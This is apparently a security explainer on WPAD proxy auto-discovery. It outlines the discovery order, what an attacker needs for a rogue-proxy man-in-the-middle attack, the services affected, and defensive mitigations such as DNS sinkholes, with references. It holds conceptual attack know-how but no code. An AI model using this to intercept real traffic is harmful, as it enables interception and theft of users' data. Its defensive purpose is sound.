WPAD - Web Proxy Auto Discovery.

WPAD protocol is a mechanism used by web clients to locate a browser configuration file (WPAD.dat) to obtain nearby proxy server details.

Supported browser:

• Microsoft IE
• Mozilla Firefox
• Google Chrome
• Apple Safari

WPAD allows users to obtain PAC file location with one of the following methods:

1. From DHCP server.
2. Request to DNS server.
3. Request to WINS server
4. LLMNR multicast request.
5. NetBIOS Name broadcast request.
6. Hosts local file.
7. Lmhosts local file.

There are the following PAC file requirements if WPAD is used: 

• PAC file should be located in root folder on web server.
• PAC file name should be wpad.dat.

To conduct the attack successfully an attacker should have:

• Specially crafted PAC file on web server.
• Rouge Proxy server controlled by the attacker;
• Tools required: SSL session hijacker, network packet analyser, etc.

Vulnerability: The most vulnerable part in WPAD technology is the PAC file discovery process itself.

Discovery Process: if the system name is "ltp.us.company.com", following is the order of query.

1. Wpad.us.company.com
2. Wpad.company.com
3. Wpad.com

Attack Scenario using DNS



Attack scenario using NetBIOS/LLMNR



Services that use WPAD regardless of IE settings

• Windows Update Service
• Microsoft Crypto API uses it for CRL or Root CA
• Microsoft firewall client for ISA server with certain settings.

Note: windows update and crypto API send only signed data so they are not vulnerable to M-i-M attack, but above attack can cause incorrect functioning of these services.

Solutions:

1. Configure firewalls and proxies to log and block outbound requests for wpad.dat files.
2. Consider disabling automatic proxy discovery/configuration in browsers and operating systems unless those systems will only be used on internal networks.
3. Configure internal DNS servers to respond authoritatively to internal TLD queries
4. Distribute PAC file thru group policy.
5. Allow only authenticated updates of entries on DNS server
6. Create a DNS sinkhole entry for wpad file location.

Reference:

• https://findproxyforurl.com/deploying-wpad/
• https://www.websense.com/content/support/library/web/v78/wcg_help/xplctwpd.aspx
• https://www.cisco.com/c/en/us/td/docs/security/web_security/connector/connector3000/WPADAP.html
• https://googleprojectzero.blogspot.com/2017/12/apacolypse-now-exploiting-windows-10-in_18.html
• https://www.ptsecurity.com/upload/corporate/ww-en/download/wpad_weakness_en.pdf
• https://tools.ietf.org/html/draft-ietf-wrec-wpad-01
• https://kc.mcafee.com/corporate/index?page=content&id=KB90075&locale=en_US
• https://auth0.com/blog/heads-up-https-is-not-enough-when-using-wpad/
• https://securityintelligence.com/news/wpad-leaks-could-mean-flood-of-url-trouble/
• https://www.cvedetails.com/cve/CVE-2016-3213/